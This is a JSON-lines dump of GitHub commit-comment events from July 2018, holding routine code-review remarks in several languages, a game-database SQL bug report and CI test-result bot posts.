{"id":"7933914534","type":"CommitCommentEvent","actor":{"login":"AKryukov92"},"repo":{"name":"YMnkf/java18may"},"payload":{"comment":{"id":29633431,"position":32,"line":32,"path":"Java18_05_2018/src/LR6/Task40.java","commit_id":"a4d8a609b1c38acc9aa8ab20f95ef5f87152c008","created_at":"2018-07-08T13:03:34Z","updated_at":"2018-07-08T13:03:34Z","author_association":"CONTRIBUTOR","body":"Думаю это выражение можно как-нибудь сократить."}},"created_at":"2018-07-08T13:03:34Z"}
{"id":"7933915865","type":"CommitCommentEvent","actor":{"login":"Trainerbluetube"},"repo":{"name":"KadePcGames/Kades-DDLC-Mods"},"payload":{"comment":{"id":29633434,"position":null,"line":null,"path":null,"commit_id":"9b37656bec7488c31715278328dbe36bfc83cf9b","created_at":"2018-07-08T13:04:31Z","updated_at":"2018-07-08T13:04:31Z","author_association":"NONE","body":"Where do you download the mod?"}},"created_at":"2018-07-08T13:04:31Z"}
{"id":"7933917481","type":"CommitCommentEvent","actor":{"login":"Bundesferkel"},"repo":{"name":"AshamaneProject/AshamaneCore"},"payload":{"comment":{"id":29633438,"position":null,"line":null,"path":null,"commit_id":"6a2a41e3c265f1e2853caf88716124ae937320ed","created_at":"2018-07-08T13:05:44Z","updated_at":"2018-07-08T13:05:44Z","author_association":"NONE","body":"Something is broken in this sql.\r\n\r\n4 guids are already taken (duplicate) in the world-db:\r\nDELETE FROM `creature` WHERE (id = 42407) AND (guid IN (210119100, 210119093, 210119094, 210119101));\r\nINSERT INTO `creature` (`guid`, `id`, `map`, `zoneId`, `areaId`, `spawnMask`, `phaseUseFlags`, `PhaseId`, `PhaseGroup`, `terrainSwapMap`, `modelid`, `equipment_id`, `position_x`, `position_y`, `position_z`, `orientation`, `spawntimesecs`, `spawndist`, `currentwaypoint`, `curhealth`, `curmana`, `MovementType`, `npcflag`, `unit_flags`, `unit_flags2`, `unit_flags3`, `dynamicflags`, `ScriptName`, `VerifiedBuild`) VALUES\r\n(210119100, 42407, 0, 0, 0, 1, 0, 0, 0, -1, 0, 1, -10427, 948.85, 33.3059, 0.784887, 10, 0, 0, 3452, 0, 0, 0, 0, 0, 0, 0, '', 0),\r\n(210119093, 42407, 0, 0, 0, 1, 0, 0, 0, -1, 0, 1, -10417.9, 950.789, 32.3799, 4.77236, 10, 0, 0, 3452, 0, 0, 0, 0, 0, 0, 0, '', 0),\r\n(210119094, 42407, 0, 0, 0, 1, 0, 0, 0, -1, 0, 1, -10413.6, 962.304, 33.3142, 5.18705, 10, 0, 0, 3858, 0, 0, 0, 0, 0, 0, 0, '', 0),\r\n(210119101, 42407, 0, 0, 0, 1, 0, 0, 0, -1, 0, 1, -10398.6, 1027.4, 32.618, 2.88975, 10, 0, 0, 2856, 0, 0, 0, 0, 0, 0, 0, '', 0);\r\n\r\nI think the problem is this one:\r\nDELETE FROM `creature` WHERE (id = 42407)\r\n\r\nIf you're setting up ashame fresh, there are entries beginning with '9xxxx' in the guid and they won't be deleted on this.\r\n\r\n\r\nThe second problem is a syntax error on line 75:\r\nUPDATE `creature_equip_template` SET `ItemID1`='45123' WHERE  `CreatureID`=86087 \r\n\r\nJust a missing semicolon."}},"created_at":"2018-07-08T13:05:44Z"}
{"id":"7933917570","type":"CommitCommentEvent","actor":{"login":"AKryukov92"},"repo":{"name":"YMnkf/java18may"},"payload":{"comment":{"id":29633440,"position":16,"line":16,"path":"Java18_05_2018/src/LR6/Task40.java","commit_id":"a4d8a609b1c38acc9aa8ab20f95ef5f87152c008","created_at":"2018-07-08T13:05:49Z","updated_at":"2018-07-08T13:05:49Z","author_association":"CONTRIBUTOR","body":"Посмотрите мой вариант решения, найдите в чем он отличается от вашего. Потом на занятии расскажете.\r\n```\r\n    Scanner sc = new Scanner(System.in);\r\n\r\n    int a;\r\n    int b;\r\n\r\n    a = sc.nextInt();\r\n    b = sc.nextInt();\r\n\r\n    if (a == b){\r\n      System.out.print(a);\r\n    } else if (a < b){\r\n      int i = a + 2;\r\n      if (a%2 == 0) {\r\n        System.out.print(a + 1);\r\n        i++;\r\n      } else {\r\n        System.out.print(a);\r\n      }\r\n      while (i <= b){\r\n        System.out.print(\", \");\r\n        System.out.print(i);\r\n        i+=2;\r\n      }\r\n    } else {\r\n      int i = a - 2;\r\n      if (a%2 == 0) {\r\n        System.out.print(a - 1);\r\n        i--;\r\n      } else {\r\n        System.out.print(a);\r\n      }\r\n      while (i >= b){\r\n        System.out.print(\", \");\r\n        System.out.print(i);\r\n        i-=2;\r\n      }\r\n    }\r\n```"}},"created_at":"2018-07-08T13:05:49Z"}
{"id":"7933922943","type":"CommitCommentEvent","actor":{"login":"ghkltm2"},"repo":{"name":"a78sm1994/GW_GD"},"payload":{"comment":{"id":29633447,"position":null,"line":null,"path":null,"commit_id":"521a493cc39452eed2b72c89c129f94b3e55a474","created_at":"2018-07-08T13:09:34Z","updated_at":"2018-07-08T13:09:34Z","author_association":"NONE","body":"Hello?"}},"created_at":"2018-07-08T13:09:34Z"}
{"id":"7933923049","type":"CommitCommentEvent","actor":{"login":"AKryukov92"},"repo":{"name":"YMnkf/java18may"},"payload":{"comment":{"id":29633448,"position":24,"line":24,"path":"Java18_05_2018/src/LR6/Task41.java","commit_id":"a4d8a609b1c38acc9aa8ab20f95ef5f87152c008","created_at":"2018-07-08T13:09:38Z","updated_at":"2018-07-08T13:09:38Z","author_association":"CONTRIBUTOR","body":"Посмотрите как у вас решена задача 14. Там тоже была конструкция.\r\n```\r\nif(a<b){\r\n  //большой алгоритм\r\n}\r\nif(b<a){\r\n  //большой алгоритм, похожий на случай a < b\r\n}\r\n```\r\nи мы ее перестроили так, чтобы большой алгоритм был написан всего один раз.\r\n\r\nНапишите еще один вариант решения этой задачи с использованием приема, который мы применяли в задаче 14."}},"created_at":"2018-07-08T13:09:38Z"}
{"id":"7933923795","type":"CommitCommentEvent","actor":{"login":"CEBA77"},"repo":{"name":"sharpie7/circuitjs1"},"payload":{"comment":{"id":29633451,"position":null,"line":null,"path":null,"commit_id":"6c5f60b2bcbe48e150bc4feebe1dbe6aee116f8c","created_at":"2018-07-08T13:10:12Z","updated_at":"2018-07-08T13:10:12Z","author_association":"NONE","body":"Hello sharpie7! I'm sorry, but I forget to write to you that I'm also working whith your program. In my repository, your program is in the nw.js shell (<https://github.com/CEBA77/circuitjs1>). I also translated it into Russian. Thank you very much for the program!"}},"created_at":"2018-07-08T13:10:12Z"}
{"id":"7933924556","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"K0H205/second_app"},"payload":{"comment":{"id":29633454,"position":31,"line":8,"path":"app/views/layouts/_header.html.erb","commit_id":"208e7ea2e7285dba7b6e15bbced14b90495a83cf","created_at":"2018-07-08T13:10:46Z","updated_at":"2018-07-08T13:10:46Z","author_association":"NONE","body":"@K0H205 ここは、rails routesを実行して表示される prefixを使ったコードに変えたいですね。"}},"created_at":"2018-07-08T13:10:46Z"}
{"id":"7933924822","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"K0H205/second_app"},"payload":{"comment":{"id":29633455,"position":33,"line":10,"path":"app/views/layouts/_header.html.erb","commit_id":"208e7ea2e7285dba7b6e15bbced14b90495a83cf","created_at":"2018-07-08T13:10:59Z","updated_at":"2018-07-08T13:10:59Z","author_association":"NONE","body":"@K0H205 カンマの後は、半角スペースです。"}},"created_at":"2018-07-08T13:10:59Z"}
{"id":"7933925461","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29633456,"position":null,"line":null,"path":null,"commit_id":"07dda535fbba5325b4ddbe577e9fdbc75876a6a7","created_at":"2018-07-08T13:11:28Z","updated_at":"2018-07-08T13:11:28Z","author_association":"NONE","body":"179D_Reporting-v8.8.0 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1684 of 1684 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-07dda535fbba5325b4ddbe577e9fdbc75876a6a7-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-07dda535fbba5325b4ddbe577e9fdbc75876a6a7-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-07dda535fbba5325b4ddbe577e9fdbc75876a6a7-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.18%25-green.png)</a>\n"}},"created_at":"2018-07-08T13:11:28Z"}
{"id":"7933926346","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"K0H205/second_app"},"payload":{"comment":{"id":29633457,"position":null,"line":null,"path":null,"commit_id":"208e7ea2e7285dba7b6e15bbced14b90495a83cf","created_at":"2018-07-08T13:12:09Z","updated_at":"2018-07-08T13:12:09Z","author_association":"NONE","body":"@K0H205 form_with化以外の作業内容も含まれていたので、気をつけましょう〜〜！ :D"}},"created_at":"2018-07-08T13:12:09Z"}
{"id":"7933927260","type":"CommitCommentEvent","actor":{"login":"xuwei-k"},"repo":{"name":"sbt/sbt"},"payload":{"comment":{"id":29633458,"position":137,"line":146,"path":"main/src/main/scala/sbt/internal/CrossJava.scala","commit_id":"2da1aa61eb499c01d14ca64491b1a46f3599269a","created_at":"2018-07-08T13:12:46Z","updated_at":"2018-07-08T13:12:46Z","author_association":"MEMBER","body":"<img width=\"427\" alt=\"screen shot 2018-07-08 at 22 10 35\" src=\"https://user-images.githubusercontent.com/389787/42420112-f452286e-82fb-11e8-8dee-e0943ff10d8a.png\">\r\n\r\n`versions` is `Seq[String]`. `v` is `JavaVersion`"}},"created_at":"2018-07-08T13:12:46Z"}
{"id":"7933930040","type":"CommitCommentEvent","actor":{"login":"K0H205"},"repo":{"name":"K0H205/second_app"},"payload":{"comment":{"id":29633464,"position":33,"line":10,"path":"app/views/layouts/_header.html.erb","commit_id":"208e7ea2e7285dba7b6e15bbced14b90495a83cf","created_at":"2018-07-08T13:14:40Z","updated_at":"2018-07-08T13:14:40Z","author_association":"OWNER","body":"はい！修正します！"}},"created_at":"2018-07-08T13:14:40Z"}
{"id":"7933930448","type":"CommitCommentEvent","actor":{"login":"haskell-jp-bot"},"repo":{"name":"haskell-jp/blog"},"payload":{"comment":{"id":29633466,"position":null,"line":null,"path":null,"commit_id":"1e7ec3fa0e8614d0ff20942e3af82c45b22cdd24","created_at":"2018-07-08T13:15:01Z","updated_at":"2018-07-08T13:15:01Z","author_association":"NONE","body":"https://circleci.com/gh/haskell-jp/blog/491/artifacts/0/root/project/generated-site/index.html"}},"created_at":"2018-07-08T13:15:01Z"}
{"id":"7933930510","type":"CommitCommentEvent","actor":{"login":"ekeeke"},"repo":{"name":"ekeeke/Genesis-Plus-GX"},"payload":{"comment":{"id":29633469,"position":null,"line":null,"path":null,"commit_id":"7af5a0cdf484b0d6534024d02e07eda16340a50f","created_at":"2018-07-08T13:15:04Z","updated_at":"2018-07-08T13:15:04Z","author_association":"OWNER","body":"Indeed, that's only defined at compiler level so there is no visibility in Makefile and `__MINGW64__` seems to be defined by MinGW-w64 only when building 64-bit application.\r\n\r\nThere isn't much solution actually, it seems impossible to have Makefile compatible with both MinGW and MinGW-w64 as the former doesn't provide or define fseeko because it's a non-standard POSIX extension (which is out of the scope of original MinGW project) while the later provides a non-standard fseeko implementation which simply calls fseeko64 function (see https://sourceforge.net/p/mingw-w64/code/HEAD/tree/trunk/mingw-w64-crt/stdio/fseeko32.c).\r\n\r\nSo the only solution is to force people using either one of the other. Currently https://github.com/ekeeke/Genesis-Plus-GX/blob/master/sdl/readme-sdl.txt tells people to use MinGW but you can update it to use MinGW-w64 (and force -DHAVE_FSEEKO to build libFLAC) if you think it's more widely installed.\r\n\r\nMaybe it's also possible to check for __MINGW32_VERSION in https://github.com/ekeeke/Genesis-Plus-GX/blob/master/core/cd_hw/libchdr/deps/libFLAC/include/share/compat.h to detect use of MinGW-w64 and do not check DHAVE_FSEEKO in that case, but I amnot sure."}},"created_at":"2018-07-08T13:15:04Z"}
{"id":"7933931010","type":"CommitCommentEvent","actor":{"login":"xxxWILL-INFxxx"},"repo":{"name":"Muqsit/SkyWars"},"payload":{"comment":{"id":29633473,"position":null,"line":null,"path":null,"commit_id":"3a2d2104a975e724934fc48d33b09760d120a9f6","created_at":"2018-07-08T13:15:24Z","updated_at":"2018-07-08T13:15:24Z","author_association":"NONE","body":":v"}},"created_at":"2018-07-08T13:15:24Z"}
{"id":"7933932664","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"K0H205/second_app"},"payload":{"comment":{"id":29633482,"position":3,"line":2,"path":"app/views/likes/_like.html.erb","commit_id":"208e7ea2e7285dba7b6e15bbced14b90495a83cf","created_at":"2018-07-08T13:16:36Z","updated_at":"2018-07-08T13:16:36Z","author_association":"NONE","body":"@K0H205 できれば、ここでは、ActiveRecordメソッドを使いたくないですね〜。コントローラ側で取得したものを渡してあげたいです。"}},"created_at":"2018-07-08T13:16:36Z"}
{"id":"7933933053","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"K0H205/second_app"},"payload":{"comment":{"id":29633483,"position":2,"line":1,"path":"app/views/microposts/new.html.erb","commit_id":"208e7ea2e7285dba7b6e15bbced14b90495a83cf","created_at":"2018-07-08T13:16:55Z","updated_at":"2018-07-08T13:16:55Z","author_association":"NONE","body":"@K0H205 いいですね！"}},"created_at":"2018-07-08T13:16:55Z"}
{"id":"7933933152","type":"CommitCommentEvent","actor":{"login":"FDws"},"repo":{"name":"SevenAMan/CarRent"},"payload":{"comment":{"id":29633484,"position":null,"line":null,"path":null,"commit_id":"fb62c610fc92289b010732d1ce8c5eb655320994","created_at":"2018-07-08T13:17:00Z","updated_at":"2018-07-08T13:17:00Z","author_association":"CONTRIBUTOR","body":"Nice"}},"created_at":"2018-07-08T13:17:00Z"}
{"id":"7933933549","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"K0H205/second_app"},"payload":{"comment":{"id":29633485,"position":3,"line":2,"path":"app/views/users/edit.html.erb","commit_id":"208e7ea2e7285dba7b6e15bbced14b90495a83cf","created_at":"2018-07-08T13:17:16Z","updated_at":"2018-07-08T13:17:16Z","author_association":"NONE","body":"@K0H205 いいですね！"}},"created_at":"2018-07-08T13:17:16Z"}
{"id":"7933933685","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"K0H205/second_app"},"payload":{"comment":{"id":29633486,"position":6,"line":2,"path":"app/views/users/new.html.erb","commit_id":"208e7ea2e7285dba7b6e15bbced14b90495a83cf","created_at":"2018-07-08T13:17:23Z","updated_at":"2018-07-08T13:17:23Z","author_association":"NONE","body":"@K0H205 いいですね！"}},"created_at":"2018-07-08T13:17:23Z"}
{"id":"7933934243","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"K0H205/second_app"},"payload":{"comment":{"id":29633487,"position":33,"line":10,"path":"app/views/layouts/_header.html.erb","commit_id":"208e7ea2e7285dba7b6e15bbced14b90495a83cf","created_at":"2018-07-08T13:17:45Z","updated_at":"2018-07-08T13:17:45Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-08T13:17:45Z"}
{"id":"7933935239","type":"CommitCommentEvent","actor":{"login":"zhangchen91"},"repo":{"name":"GraphQL-China/vue-apollo"},"payload":{"comment":{"id":29633489,"position":8,"line":7,"path":"docs/zh-cn/api/apollo-mutation.md","commit_id":"d1c3cb9a1978b12cee1d5ce335807026faa957c4","created_at":"2018-07-08T13:18:34Z","updated_at":"2018-07-08T13:18:34Z","author_association":"NONE","body":"这个乐观似乎不用翻译"}},"created_at":"2018-07-08T13:18:34Z"}
{"id":"7933935334","type":"CommitCommentEvent","actor":{"login":"alexellis"},"repo":{"name":"ewilde/faas-ecs"},"payload":{"comment":{"id":29633490,"position":103,"line":103,"path":"CONTRIBUTING.md","commit_id":"c3b3ed4fe579974f72c3ba58043b732cf0777b6b","created_at":"2018-07-08T13:18:39Z","updated_at":"2018-07-08T13:18:39Z","author_association":"COLLABORATOR","body":"Copyright notice for contributor should be either their own name or \"faas-fargate Contributor (s)\" "}},"created_at":"2018-07-08T13:18:39Z"}
{"id":"7933936123","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"antretterf/EnergyPlus"},"payload":{"comment":{"id":29633492,"position":null,"line":null,"path":null,"commit_id":"f3da7217b803b6bc1de06c6a9e9884b017ba381c","created_at":"2018-07-08T13:19:15Z","updated_at":"2018-07-08T13:19:15Z","author_association":"NONE","body":"HAMT1_180406 (antretterf) - x86_64-MacOS-10.9-clang: OK (2920 of 2928 tests passed, 12 test warnings)\n\nMessages:\n\n * 11 tests had: EIO diffs.\n * 3 tests had: ESO small diffs.\n * 3 tests had: Table small diffs.\n * 10 tests had: AUD diffs.\n * 1 test had: BND diffs.\n * 8 tests had: ESO big diffs.\n * 6 tests had: Table big diffs.\n * 2 tests had: MTD diffs.\n * 3 tests had: MTR big diffs.\n * 2 tests had: MTR small diffs.\n * 2 tests had: ERR diffs.\n * 1 test had: SSZ big diffs.\n * 1 test had: ZSZ big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 617\n * Failed: 8\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3da7217b803b6bc1de06c6a9e9884b017ba381c-PR6715-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3da7217b803b6bc1de06c6a9e9884b017ba381c-PR6715-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.73%25-yellow.png)</a> \n"}},"created_at":"2018-07-08T13:19:15Z"}
{"id":"7933937754","type":"CommitCommentEvent","actor":{"login":"zhangchen91"},"repo":{"name":"GraphQL-China/vue-apollo"},"payload":{"comment":{"id":29633493,"position":22,"line":14,"path":"docs/zh-cn/api/apollo-mutation.md","commit_id":"d1c3cb9a1978b12cee1d5ce335807026faa957c4","created_at":"2018-07-08T13:20:31Z","updated_at":"2018-07-08T13:20:31Z","author_association":"NONE","body":"调用 mutation 的函数。你可以重载 mutation 的参数"}},"created_at":"2018-07-08T13:20:31Z"}
{"id":"7933937818","type":"CommitCommentEvent","actor":{"login":"K0H205"},"repo":{"name":"K0H205/second_app"},"payload":{"comment":{"id":29633494,"position":31,"line":8,"path":"app/views/layouts/_header.html.erb","commit_id":"208e7ea2e7285dba7b6e15bbced14b90495a83cf","created_at":"2018-07-08T13:20:33Z","updated_at":"2018-07-08T13:20:33Z","author_association":"OWNER","body":"はい！考えてみます！\r\n"}},"created_at":"2018-07-08T13:20:33Z"}
{"id":"7933937844","type":"CommitCommentEvent","actor":{"login":"davidburstromspotify"},"repo":{"name":"koral--/gradle-pitest-plugin"},"payload":{"comment":{"id":29633495,"position":9,"line":9,"path":"src/main/groovy/info/solidsoft/gradle/pitest/PitestMockableAndroidJarTask.groovy","commit_id":"771da309196363c9d01ffb929b33f924b0d1ebf7","created_at":"2018-07-08T13:20:35Z","updated_at":"2018-07-08T13:20:35Z","author_association":"NONE","body":"It seems to me while bumping to AGP 3.2 that there is no need for producing this jar-file, as it will be generated and put on the classpath anyway. This was enough for me in `createPitestTasks`:\r\n```\r\n       if (!ANDROID_GRADLE_PLUGIN_VERSION.startsWith('3.2')) {\r\n                variantTask.dependsOn project.tasks.getByName(\"mockableAndroidJar\")\r\n            }\r\n```"}},"created_at":"2018-07-08T13:20:35Z"}
{"id":"7933937982","type":"CommitCommentEvent","actor":{"login":"Harvie"},"repo":{"name":"vlachoudis/bCNC"},"payload":{"comment":{"id":29633496,"position":null,"line":null,"path":null,"commit_id":"7d780a729102f0244c6a43bf68c381be87f22166","created_at":"2018-07-08T13:20:41Z","updated_at":"2018-07-08T13:20:41Z","author_association":"CONTRIBUTOR","body":"Yes. thanks for the point. i guess i might optimize the number of dependencies once the plugins are complete. right now they're both alpha preview, so i can get feedback on features. once the code stabilize i can surely handle this. but i think it's still bit early and some pieces might get complete rewrite..."}},"created_at":"2018-07-08T13:20:41Z"}
{"id":"7933938588","type":"CommitCommentEvent","actor":{"login":"krharesh"},"repo":{"name":"krharesh/Text-To-Speech-Android"},"payload":{"comment":{"id":29633499,"position":null,"line":null,"path":null,"commit_id":"14f50b1a943534e5cf6b1e44f7b5cc01dc2ad8af","created_at":"2018-07-08T13:21:08Z","updated_at":"2018-07-08T13:21:08Z","author_association":"OWNER","body":"Hi,\r\nI do only android projects don't have idea about **javascript** !"}},"created_at":"2018-07-08T13:21:08Z"}
{"id":"7933939591","type":"CommitCommentEvent","actor":{"login":"stanislav-balev"},"repo":{"name":"stanislav-balev/ceaser-cipher"},"payload":{"comment":{"id":29633503,"position":null,"line":null,"path":null,"commit_id":"a01cc15f720b03e191e59e084b55fe50f2c5262b","created_at":"2018-07-08T13:21:55Z","updated_at":"2018-07-08T13:21:55Z","author_association":"OWNER","body":"comment"}},"created_at":"2018-07-08T13:21:55Z"}
{"id":"7933939697","type":"CommitCommentEvent","actor":{"login":"K0H205"},"repo":{"name":"K0H205/second_app"},"payload":{"comment":{"id":29633504,"position":null,"line":null,"path":null,"commit_id":"208e7ea2e7285dba7b6e15bbced14b90495a83cf","created_at":"2018-07-08T13:22:00Z","updated_at":"2018-07-08T13:22:00Z","author_association":"OWNER","body":"ついつい他の修正もしてしまうので、closeしたいときはその作業だけに集中します。。"}},"created_at":"2018-07-08T13:22:00Z"}
{"id":"7933939819","type":"CommitCommentEvent","actor":{"login":"mksully22"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29633505,"position":null,"line":null,"path":null,"commit_id":"f420f9b85b5f5612f58a45ab49e8aba54f6f5527","created_at":"2018-07-08T13:22:06Z","updated_at":"2018-07-08T13:22:06Z","author_association":"CONTRIBUTOR","body":"yep, I'll take a look"}},"created_at":"2018-07-08T13:22:06Z"}
{"id":"7933941179","type":"CommitCommentEvent","actor":{"login":"K0H205"},"repo":{"name":"K0H205/second_app"},"payload":{"comment":{"id":29633507,"position":3,"line":2,"path":"app/views/likes/_like.html.erb","commit_id":"208e7ea2e7285dba7b6e15bbced14b90495a83cf","created_at":"2018-07-08T13:23:07Z","updated_at":"2018-07-08T13:23:07Z","author_association":"OWNER","body":"はい！考えてみます！"}},"created_at":"2018-07-08T13:23:07Z"}
{"id":"7933941771","type":"CommitCommentEvent","actor":{"login":"minhhieu9800"},"repo":{"name":"minhhieu9800/final-project"},"payload":{"comment":{"id":29633510,"position":null,"line":null,"path":null,"commit_id":"5a568f8cca2692be0b56f6c724d7cffb6c5e8bf5","created_at":"2018-07-08T13:23:33Z","updated_at":"2018-07-08T13:23:33Z","author_association":"OWNER","body":"good"}},"created_at":"2018-07-08T13:23:33Z"}
{"id":"7933948689","type":"CommitCommentEvent","actor":{"login":"Y-Less"},"repo":{"name":"pawn-lang/YSI-Includes"},"payload":{"comment":{"id":29633522,"position":null,"line":null,"path":null,"commit_id":"3baec21f8ca0bcf3c44473904fbc624145773a97","created_at":"2018-07-08T13:28:41Z","updated_at":"2018-07-08T13:28:41Z","author_association":"MEMBER","body":"This has LONG been deprecated.  Maybe I will introduce a warning period."}},"created_at":"2018-07-08T13:28:41Z"}
{"id":"7933951165","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18021/programming-term2"},"payload":{"comment":{"id":29633535,"position":null,"line":null,"path":null,"commit_id":"e437c7f82f6a7687c27060be9ddcdaf7f4061348","created_at":"2018-07-08T13:30:29Z","updated_at":"2018-07-08T13:30:29Z","author_association":"NONE","body":"7/6にコメントさせてもらってたはずが反映されていなかったみたいです。\r\n失礼しました。\r\n\r\n計算結果は正解で、コードも読みやすいのでOKです。\r\nですが、以下に改善点を挙げます。余力があれば修正してみてください。\r\n・rateが割引率でなく、「割り引いた結果の率」なので、コメントとコードが一致していないように思う\r\n　出題意図からすると、文中で「2割引」と提示しているので、rateには0.2を代入し、\r\n　計算の中で1から引くとより良い。\r\n・おつまみの個数が計算に登場しない。\r\n　「変数」は「変更に対応できる器」と考えてください。\r\n　例えば、おつまみの数量を2個や3個にしたい場合に、この式のままだと正しい結果に\r\n　ならないですよね。\r\n\r\n以上、ご確認ください。"}},"created_at":"2018-07-08T13:30:29Z"}
{"id":"7933952702","type":"CommitCommentEvent","actor":{"login":"Beamanator"},"repo":{"name":"Beamanator/RIPS-Auto-Import-CExt"},"payload":{"comment":{"id":29633539,"position":null,"line":null,"path":null,"commit_id":"eca11b565598102c297a1ce13d632251f1bace99","created_at":"2018-07-08T13:31:34Z","updated_at":"2018-07-08T13:31:34Z","author_association":"OWNER","body":"Old id = 'CASEWORKERID', new = 'cwValue'"}},"created_at":"2018-07-08T13:31:34Z"}
{"id":"7933953311","type":"CommitCommentEvent","actor":{"login":"koral--"},"repo":{"name":"koral--/gradle-pitest-plugin"},"payload":{"comment":{"id":29633542,"position":9,"line":9,"path":"src/main/groovy/info/solidsoft/gradle/pitest/PitestMockableAndroidJarTask.groovy","commit_id":"771da309196363c9d01ffb929b33f924b0d1ebf7","created_at":"2018-07-08T13:32:03Z","updated_at":"2018-07-08T13:32:03Z","author_association":"OWNER","body":"Right, we don't need to invoke this task when running on AGP < 3.2.\r\nThanks for pointing this out.\r\nI'll add such check."}},"created_at":"2018-07-08T13:32:03Z"}
{"id":"7933953518","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":29633544,"position":4,"line":206,"path":"desktop/src/com/frostwire/gui/components/transfers/TransferDetailGeneral.java","commit_id":"fa2a19cf5cdbce7f96cf32559346df97f0549f78","created_at":"2018-07-08T13:32:13Z","updated_at":"2018-07-08T13:32:13Z","author_association":"COLLABORATOR","body":"If I remember correctly, I have at least one check (if the Tab is selected and the component is visible, then invoke updateData), maybe we need to add another when shutting down."}},"created_at":"2018-07-08T13:32:13Z"}
{"id":"7933953972","type":"CommitCommentEvent","actor":{"login":"Rolandkuku"},"repo":{"name":"esgiprojetninja/devAwayApi"},"payload":{"comment":{"id":29633546,"position":6,"line":35,"path":"routes/api.php","commit_id":"d49ade607f6b3e9787360dfcbd11ef6f83abbef4","created_at":"2018-07-08T13:32:33Z","updated_at":"2018-07-08T13:32:33Z","author_association":"CONTRIBUTOR","body":"BONJOUR"}},"created_at":"2018-07-08T13:32:33Z"}
{"id":"7933955727","type":"CommitCommentEvent","actor":{"login":"janekptacijarabaci"},"repo":{"name":"MoonchildProductions/UXP"},"payload":{"comment":{"id":29633550,"position":null,"line":null,"path":null,"commit_id":"764d0af25ea2c5713958a4b8b8c524b09640a24c","created_at":"2018-07-08T13:33:52Z","updated_at":"2018-07-08T13:33:52Z","author_association":"CONTRIBUTOR","body":"@wolfbeast \r\n`browser.newtabpage.enhanced` still exists:\r\nhttp://xref.palemoon.org/uxp-trunk/source/toolkit/modules/NewTabUtils.jsm#39\r\n"}},"created_at":"2018-07-08T13:33:52Z"}
{"id":"7933966563","type":"CommitCommentEvent","actor":{"login":"z16"},"repo":{"name":"Windower/packages"},"payload":{"comment":{"id":29633570,"position":6,"line":17,"path":"world_service/world_service.lua","commit_id":"e3b2e47b7295af4fc8b6d3b674af99402633e7fc","created_at":"2018-07-08T13:41:32Z","updated_at":"2018-07-08T13:41:32Z","author_association":"MEMBER","body":"May as well add a comma here :)"}},"created_at":"2018-07-08T13:41:32Z"}
{"id":"7933968859","type":"CommitCommentEvent","actor":{"login":"YeahYR"},"repo":{"name":"ye15331374/phone"},"payload":{"comment":{"id":29633573,"position":null,"line":null,"path":null,"commit_id":"1c9bc897eaae24f72d5dd3508cc4edab1d6b72d1","created_at":"2018-07-08T13:43:05Z","updated_at":"2018-07-08T13:43:05Z","author_association":"COLLABORATOR","body":"实验报告"}},"created_at":"2018-07-08T13:43:05Z"}
{"id":"7933969224","type":"CommitCommentEvent","actor":{"login":"Jacknet"},"repo":{"name":"Jacknet/EasyRP"},"payload":{"comment":{"id":29633574,"position":null,"line":null,"path":null,"commit_id":"53eda03e3feb47c1169539bb34c941ede0502287","created_at":"2018-07-08T13:43:20Z","updated_at":"2018-07-08T13:43:20Z","author_association":"OWNER","body":"Forgot to mention #26 as well is merged"}},"created_at":"2018-07-08T13:43:20Z"}
{"id":"7933972291","type":"CommitCommentEvent","actor":{"login":"dsmiley"},"repo":{"name":"apache/lucene-solr"},"payload":{"comment":{"id":29633582,"position":7,"line":54,"path":"solr/core/src/java/org/apache/solr/update/processor/NestedUpdateProcessorFactory.java","commit_id":"c8da19a0591124d575f30212076899c32d8db8b2","created_at":"2018-07-08T13:45:26Z","updated_at":"2018-07-08T13:45:26Z","author_association":"CONTRIBUTOR","body":"A space could lead to confusion; lets not do that.  I was thinking simply blank (empty string).  Would that work?"}},"created_at":"2018-07-08T13:45:26Z"}
